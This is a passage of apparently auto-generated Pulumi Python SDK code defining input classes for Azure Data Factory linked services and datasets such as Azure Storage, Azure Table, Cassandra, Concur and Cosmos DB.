connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
connection_string: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
sas_uri: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None):
"""
The storage account linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any connection_string: The connection string. It is mutually exclusive with sasUri property. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] sas_uri: SAS URI of the Azure Storage resource. It is mutually exclusive with connectionString property.
"""
pulumi.set(__self__, "type", 'AzureStorage')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if sas_uri is not None:
pulumi.set(__self__, "sas_uri", sas_uri)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[Any]:
"""
The connection string. It is mutually exclusive with sasUri property. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[Any]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="sasUri")
def sas_uri(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
SAS URI of the Azure Storage resource. It is mutually exclusive with connectionString property.
"""
return pulumi.get(self, "sas_uri")
@sas_uri.setter
def sas_uri(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "sas_uri", value)
@pulumi.input_type
class AzureTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
table_name: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The Azure Table storage dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param Any table_name: The table name of the Azure Table storage. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "table_name", table_name)
pulumi.set(__self__, "type", 'AzureTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter(name="tableName")
def table_name(self) -> Any:
"""
The table name of the Azure Table storage. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "table_name")
@table_name.setter
def table_name(self, value: Any):
pulumi.set(self, "table_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class CassandraLinkedServiceArgs:
def __init__(__self__, *,
host: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[Any] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
username: Optional[Any] = None):
"""
Linked service for Cassandra data source.
:param Any host: Host name for connection. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param Any authentication_type: AuthenticationType to be used for connection. Type: string (or Expression with resultType string).
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password for authentication.
:param Any port: The port for the connection. Type: integer (or Expression with resultType integer).
:param Any username: Username for authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Cassandra')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def host(self) -> Any:
"""
Host name for connection. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[Any]:
"""
AuthenticationType to be used for connection. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[Any]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password for authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The port for the connection. Type: integer (or Expression with resultType integer).
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
Username for authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class CassandraTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
keyspace: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None,
table_name: Optional[Any] = None):
"""
The Cassandra database dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param Any keyspace: The keyspace of the Cassandra database. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
:param Any table_name: The table name of the Cassandra database. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'CassandraTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if keyspace is not None:
pulumi.set(__self__, "keyspace", keyspace)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
if table_name is not None:
pulumi.set(__self__, "table_name", table_name)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def keyspace(self) -> Optional[Any]:
"""
The keyspace of the Cassandra database. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "keyspace")
@keyspace.setter
def keyspace(self, value: Optional[Any]):
pulumi.set(self, "keyspace", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@property
@pulumi.getter(name="tableName")
def table_name(self) -> Optional[Any]:
"""
The table name of the Cassandra database. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "table_name")
@table_name.setter
def table_name(self, value: Optional[Any]):
pulumi.set(self, "table_name", value)
@pulumi.input_type
class ConcurLinkedServiceArgs:
def __init__(__self__, *,
client_id: Any,
type: pulumi.Input[str],
username: Any,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Concur Service linked service.
:param Any client_id: Application client_id supplied by Concur App Management.
:param pulumi.Input[str] type: Type of linked service.
:param Any username: The user name that you use to access Concur Service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name that you provided in the username field.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "client_id", client_id)
pulumi.set(__self__, "type", 'Concur')
pulumi.set(__self__, "username", username)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Any:
"""
Application client_id supplied by Concur App Management.
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Any):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def username(self) -> Any:
"""
The user name that you use to access Concur Service.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Any):
pulumi.set(self, "username", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name that you provided in the username field.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class ConcurObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Concur Service dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'ConcurObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class ControlActivityArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
type: pulumi.Input[str],
depends_on: Optional[pulumi.Input[Sequence[pulumi.Input['ActivityDependencyArgs']]]] = None,
description: Optional[pulumi.Input[str]] = None):
"""
        Base class for all control activities, such as IfCondition, ForEach, and Until.
:param pulumi.Input[str] name: Activity name.
:param pulumi.Input[str] type: Type of activity.
:param pulumi.Input[Sequence[pulumi.Input['ActivityDependencyArgs']]] depends_on: Activity depends on condition.
:param pulumi.Input[str] description: Activity description.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "type", 'Container')
if depends_on is not None:
pulumi.set(__self__, "depends_on", depends_on)
if description is not None:
pulumi.set(__self__, "description", description)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Activity name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of activity.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="dependsOn")
def depends_on(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ActivityDependencyArgs']]]]:
"""
Activity depends on condition.
"""
return pulumi.get(self, "depends_on")
@depends_on.setter
def depends_on(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ActivityDependencyArgs']]]]):
pulumi.set(self, "depends_on", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Activity description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@pulumi.input_type
class CosmosDbLinkedServiceArgs:
def __init__(__self__, *,
connection_string: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Microsoft Azure Cosmos Database (CosmosDB) linked service.
:param Any connection_string: The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "connection_string", connection_string)
pulumi.set(__self__, "type", 'CosmosDb')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Any:
"""
The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Any):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
